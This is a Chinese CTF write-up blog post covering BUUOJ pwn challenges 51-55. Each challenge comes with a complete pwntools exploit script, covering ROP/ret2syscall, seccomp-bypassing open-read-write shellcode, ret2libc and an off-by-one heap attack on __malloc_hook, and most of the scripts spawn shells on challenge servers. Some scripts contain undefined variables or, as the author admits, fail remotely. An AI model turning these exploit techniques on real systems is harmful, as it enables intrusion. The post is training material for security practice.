buuoj Pwn writeup 51-55

最新推荐文章于 2023-05-23 20:23:05 发布
最新推荐文章于 2023-05-23 20:23:05 发布
阅读量280 收藏
点赞数 1
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/113790020
版权

51 cmcc_simplerop

保护
在这里插入图片描述在这里插入图片描述平平无奇栈溢出。

溢出长度虽然IDA里面 说v4开了0x14

在这里插入图片描述但是在gdb里面调试的时候发现ebp上面压了两个其他局部变量。

在这里插入图片描述有系统调用,可以ret2syscall。

exp

# -*- coding: utf-8 -*-
from pwn import *

context(arch='amd64', os='linux',log_level='debug')
#context.terminal=['tmux','splitw','-h']
r = remote('node3.buuoj.cn', 28515)
#r = process('./51')
libc = ELF("./32/libc-2.23.so")
elf=ELF("./51")

int_80h = 0x80493e1
pop_eax = 0x080bae06
pop_dcb = 0x0806e850
read_addr = 0x0806CD50
bss_addr = 0x80EBF79

payload = 'a' * 32 + p32(read_addr)
payload += p32(pop_dcb) + p32(0) + p32(bin_sh) + p32(0x8)
payload += p32(pop_eax) + p32(0xb)
payload += p32(pop_dcb) + p32(0) + p32(0) + p32(bin_sh)
payload += p32(int_addr)

r.recvuntil('input :')

r.sendline(payload)
r.sendline('/bin/sh\x00')
r.interactive()

52 pwnable_orw

保护
在这里插入图片描述在这里插入图片描述一看就是加了沙箱

seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandboxing 机制。在 Linux 系统里,大量的系统调用(system call)直接暴露给用户态程序。但是,并不是所有的系统调用都被需要,而且不安全的代码滥用系统调用会对系统造成安全威胁。seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。

在这里插入图片描述
第一次调用prctl函数 ————禁止提权
第二次调用prctl函数 ————限制能执行的系统调用只有open,read,write,exit

所以我们就是通过open函数打开flag文件,然后read读取,write写出来。

exp

from pwn import *

context(os = "linux", arch = "i386", log_level= "debug")
r = remote("node3.buuoj.cn", 27008)

shellcode = asm('push 0x0;push 0x67616c66;mov ebx,esp;xor ecx,ecx;xor edx,edx;mov eax,0x5;int 0x80')
#sys_open(file,0,0)

shellcode+=asm('mov eax,0x3;mov ecx,ebx;mov ebx,0x3;mov edx,0x100;int 0x80')
#sys_read(3,file,0x100)

shellcode+=asm('mov eax,0x4;mov ebx,0x1;int 0x80')
#sys_write(1,file,0x30)

r.sendlineafter('shellcode:', shellcode)

r.interactive()

53 jarvisoj_level1

保护

在这里插入图片描述

在这里插入图片描述平平无奇栈溢出。

还输出了buf的地址。

而且没开NX,所以直接把shellcode写到栈上,再溢过去就行。

当然也可以ret2libc。
就不写了。

本地跟远程不大一样。

exp
本地

# -*- coding: utf-8 -*-
from pwn import *

context(arch='i386', os='linux',log_level='debug')
#context.terminal=['tmux','splitw','-h']
#r = remote('node3.buuoj.cn', 29837)
r = process('./53')
libc = ELF("./32/libc-2.23.so")
elf=ELF("./53")

#r.send('\n')
r.recvuntil("0x")
buf_addr = int(r.recv(8), 16)
print hex(buf_addr)

shellcode = asm(shellcraft.sh())

payload =  shellcode + 'a' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)

r.recvuntil("?\n")
r.send(payload)

r.interactive()

远程

# -*- coding: utf-8 -*-
from pwn import *

context(arch='i386', os='linux',log_level='debug')
#context.terminal=['tmux','splitw','-h']
#r = remote('node3.buuoj.cn', 29837)
r = process('./53')
libc = ELF("./32/libc-2.23.so")
elf=ELF("./53")

main_addr=0x80484b7
write_plt=elf.plt['write']
write_got=elf.got['write']

payload ='a' * (0x88 + 0x4 ) + p32(write_plt) + p32(main_addr) +p32(0x1)+p32(write_got)+p32(0x4) 

r.send(payload)
write_addr = u32(r.recv(4))

libc_base=write_addr-libc.sym['write']

system_addr=libc_base+libc.sym['system']
bin_sh=libc_base+libc.search('/bin/sh').next()
payload ='a' * (0x88 + 0x4) + p32(system_addr) + p32(main_addr)+ p32(bin_sh)

r.send(payload)
r.interactive()

54 roarctf_2019_easy_pwn

保护
在这里插入图片描述
这个全绿有点厉害。

create
在这里插入图片描述
在这里插入图片描述他对输入的大小是有限制的。

在这里插入图片描述这个地方比较难理解
看它的汇编代码。
在这里插入图片描述以上面那个图得第一条位例
就是把那个地方里面存着的地址加上4 * i得偏移所得到的地址那个地方写上1。

write
在这里插入图片描述
在这里插入图片描述这个地方说要是后面写的大小比前面大10就会多写一个字节,就会有off by one漏洞。

drop
在这里插入图片描述show
在这里插入图片描述
drop与show都是平平无奇。

主要是那个off by one漏洞。

通过制造overlapping,然后 实际起到的效果就是chunk2能够控制,但是已经在undorted链里面了,这就跟uaf的效果一样。通过它来泄露地址,然后做fastbin_attack。
当然还是先泄露地址,然后再攻击malloc_hook吧。

# -*- coding: utf-8 -*-
from pwn import *

context(arch='i386', os='linux',log_level='debug')
#context.terminal=['tmux','splitw','-h']
r = remote('node3.buuoj.cn', 27844)
#r = process('./54')
libc = ELF("./64/libc-2.23.so")
elf=ELF("./54")

def create(size):
    r.recvuntil("choice: ")
    r.sendline("1")
    r.recvuntil("size: ")
    r.sendline(str(size))
    r.recvuntil("\n")

def write(index, size, content):
    r.recvuntil("choice: ")
    r.sendline("2")
    r.recvuntil("index: ")
    r.sendline(str(index))
    r.recvuntil("size: ")
    r.sendline(str(size))
    r.recvuntil("content: ")
    r.sendline(content)

def drop(index):
    r.recvuntil("choice: ")
    r.sendline("3")
    r.recvuntil("index: ")
    r.sendline(str(index))

def show(index):
    r.recvuntil("choice: ")
    r.sendline("4")
    r.recvuntil("index: ")
    r.sendline(str(index))

one_gadget = 0x4527a

create(0x18)
create(0x60)
create(0x60)
create(0x10)

payload = 'a' * 0x18 + '\xe1'
write(0, 0x18 + 10, payload)
drop(1)
create(0x60)

show(2)

main_arena=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-88

libc_base=main_arena-0x3c4b20
one_gadget = libc_base + one_gadget
malloc_hook = libc_base+libc.symbols['__malloc_hook']
realloc = libc_base+libc.symbols['__libc_realloc']

create(0x60)
drop(4)

payload = p64(malloc_hook - 0x23)
write(2, 8, payload)

create(0x60)

payload = 'a' * 0xb + p64(one_gadget) + p64(realloc + 13)
create(0x60)
write(5, 0x1b, payload)


r.recvuntil('choice: ')
r.sendline('1')
r.recvuntil('size: ')
r.sendline(str(0x20))

r.interactive()

这个exp可以过本地,远程可能它的libc有些问题吧,过不了,网上其它wp也都过不了。

55 picoctf_2018_buffer overflow 2

保护
在这里插入图片描述在这里插入图片描述平平无奇栈溢出。

在这里插入图片描述
满足条件溢一下就好了。

exp

# -*- coding: utf-8 -*-
from pwn import *

context(arch='i386', os='linux',log_level='debug')
#context.terminal=['tmux','splitw','-h']
r = remote('node3.buuoj.cn', 26240)
#r = process('./55')
libc = ELF("./32/libc-2.23.so")
elf=ELF("./55")

win_addr = 0x80485cb
payload = 'a' * 0x70 + p32(win_addr) +'aaaa' + p32(0x0DEADBEEF) + p32(0x0DEADC0DE)
r.sendline(payload)

r.interactive()
yongbaoii
关注
专栏目录
GKCTF 2020 部分writeup
weixin_44145820的博客
05-25 1884
目录RE[GKCTF2020]Check_1n RE [GKCTF2020]Check_1n
Dest0g3 520迎新赛 writeup (misc部分 + web部分)
ShenZ的博客
05-30 3733
Dest0g3 520迎新赛 Welcome to fxxking DestCTF 你知道js吗 StrangeTraffic Pngenius EasyWord EasyEncode Python_jail rookie hacker-1 rookie hacker-2 4096 EasySSTI phpdest EasyPHP SimpleRCE funny_upload middle PharPOP 1.phar的上传与触发 2.POP链 NodeSoEasy ezip Really Easy Sql
buuoj、xmctf、攻防世界刷题(web)write up
热门推荐
Love&Share
06-14 1万+
BUUOJ-每天两道,告别烦恼 WEB: [GXYCTF2019]BabySQli 输入用户名admin,发现可以登入,其他显示wrong user 源码中发现,存在base编码 先base32再base64解码,发现sql语句尝试去注入 首先尝试万能密码: 发现被拦截 尝试手工注入: 一个联合注入新知识 在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。 下面是一个自己的本地环境 数据库原本这几个用户名和密码 执行select * from flag WHERE username
buuoj helloword writeup
m0_73605862的博客
05-18 164
Step2:在com.example.helloworld文件目录下的smail下的com下的example下的helloword里面有MainActivity文件,点击进去发现flag。Step1:apk是安卓程序的后缀,所以这道题要用安卓的逆向工具apkIDE改之理,将程序用apkIDE打开。【来源】(buuoj)https://buuoj.cn/challenges#helloword。【思路】用apkide进行逆向分析。【题目】helloword。【题型】Reverse。
buuoj Pwn writeup 96-100
yongbaoii的博客
03-08 330
96 mrctf2020_easy_equation 保护 97 ciscn_2019_final_2 保护 98 ciscn_2019_s_9 保护 99 gyctf_2020_force 保护 100 [极客大挑战 2019]Not Bad 保护
buuoj Pwn writeup 86-90
yongbaoii的博客
03-08 250
86 axb_2019_brop64 保护 花里胡哨的。 平平无奇栈溢出。 from pwn import * context.log_level="debug" r = remote('node3.buuoj.cn',29649) elf = ELF('./86') libc = ELF("./64/libc-2.23.so") main=0x4007d6 puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] pop_rdi=0x400963 r.r
buuoj Pwn writeup 66-70
yongbaoii的博客
02-23 291
66 ciscn_2019_final_3 保护 67 mrctf2020_shellcode 保护 68 hitcontraining_magicheap 保护 69 pwnable_start 保护 70 wustctf2020_getshell_2 保护
buuoj Pwn writeup 21-30
yongbaoii的博客
02-05 1265
21 ciscn_2019_ne_5 保护 这个地方的strcpy函数,一看就估摸着有问题。 他把src那块的东西复制到了dest 但是你会发现 dest那里 0x48 但是你是可以往src那里输入东西的。 一口气能输128个字节,那这就造成了溢出。 那再说怎么利用 这个地方首先要注意他这里没有/bin/sh,但是有sh 而且还非常隐蔽 所以呢咱们这边推荐之后/bin/sh跟sh的搜索都用ROPgadget。 非常的nice 然后程序里面本来就有system函数,然后就一把梭。 exp from p
buuoj Pwn writeup 31-40
yongbaoii的博客
02-06 1444
31 [Black Watch 入群题]PWN 这个题有问题,就给了个附件,给的链接nc都连不上,做做题算了。 保护 可以往bss上写东西,然后有个溢出,但是溢出有限,只能覆盖到返回地址。 因为开了NX,所以不能写shellcode,因为溢出有限,所以先想到的是栈迁移。 把栈迁移到bss上,构造ROP,通过write函数泄露libc地址,然后就在bss上一把梭。 写法很多,我这里的话就直接先把’/bin/sh\x00’先写在了bss的位置。 exp from pwn import* from LibcSea
buuoj Pwn writeup 56-60
yongbaoii的博客
02-16 239
56 wustctf2020_getshell 保护 57 [V&N2020 公开赛]easyTHeap 保护 58 xdctf2015_pwn200 保护 59 ciscn_2019_n_3 保护 60 bbys_tu_2016 保护
buuoj Pwn writeup 146-150
yongbaoii的博客
05-28 239
146 SWPUCTF_2019_login 147 qctf2018_stack2 148 lctf2016_pwn200 149 sctf_2019_easy_heap 150 ciscn_2019_s_1
buuoj Pwn writeup 76-80
yongbaoii的博客
02-24 424
76 0ctf_2017_babyheap 保护 菜单堆。 allocate 堆的结构很明显了。要注意的是flag是四个字节。 fill 又是输入大小可以随便写。 又可以溢出。 free free的还是很干净的。 dump 平平无奇输出函数。 那么我们首先要考虑泄露libc的地址。泄露地址的方法只能去考虑unsorted bin,因为有溢出,可以完全仿照off by one,来制造overlapping,然后泄露地址啊,攻击malloc_hook,就下来了。 先来申请四个chunk。然后通过栈溢出改变c
buuoj Pwn writeup 196-200
yongbaoii的博客
06-12 434
196 gyctf_2020_bfnote 第一个漏洞点是有栈溢出,但是开了canary。第二个漏洞点是虽然会检测v4大小,但是检测完时候我们还能再次输入,所以我们会有一次任意输入的机会。 我们的想法就是改掉TLS结构体中的canary,然后rop即可。 tls结构体 typedef struct { void *tcb; /* Pointer to the TCB. Not necessarily the thread descriptor u
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 431
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道题能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
buuoj Pwn writeup 81-85
yongbaoii的博客
02-26 245
81 pwnable_hacknote 保护 菜单堆 add 申请好的结构是下面这样的。 delete 没有清理干净,uaf。 print 直接调用那个puts函数,那直接想到如果把它改成system,content里面改成’/bin/sh’,这不就好了嘛? 先申请一个0x8的,再申请0x100的,再全部释放掉,就会导致fastbin里面会有三个chunk,再申请0x8,就可以对chunk0的第一层chunk进行任意写。 因为uaf,导致我们还是能使用print函数,但是print的那个chunk被清
buuoj Pwn writeup 61-65
yongbaoii的博客
02-16 282
61 gyctf_2020_borrowstack 保护 62 inndy_rop 保护 平平无奇栈溢出。 又是要么int 80h exp 要么mprotect。 exp 63 [V&N2020 公开赛]warmup 保护 64 axb_2019_fmt32 保护 65 others_babystack 保护
buuoj Pwn writeup 101-105
yongbaoii的博客
03-08 261
101 inndy_echo 保护 就格式化字符串漏洞。 102 cmcc_pwnme1 保护 103 oneshot_tjctf_2016 保护 RELRO一点没开的…… 104 picoctf_2018_leak_me 保护 105 x_ctf_b0verfl0w 保护
buuoj Pwn writeup 106-110
yongbaoii的博客
03-08 344
106 zctf2016_note2 保护 107 suctf_2018_basic pwn 保护 ret2text? exp from pwn import * context.log_level='debug' r = remote('node3.buuoj.cn',29514) flag_addr = 0x401157 payload = 'a' * 0x118 + p64(flag_addr) r.sendline(payload) r.interactive() 108 wdb_201
buuoj 小明的保险箱 writeup
m0_73605862的博客
05-23 277
【来源】(buuoj)https://buuoj.cn/challenges#%E5%B0%8F%E6%98%8E%E7%9A%84%E4%BF%9D%E9%99%A9%E7%AE%B1。step3:根据题目提示是4位的纯数字所以是,选择所有数字,暴力破解,最大的长度和最小的长度都选择4,开始破解。得到一个rar文件夹。Step1:打开文件发现是一个图片,然后根据题目意思是有一个隐藏文件。【思路】得到隐藏文件并且暴力破解密码。Step4:得到密码,得到flag。【题目】小明的保险箱。
攻防世界pwn-forgot
最新发布
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值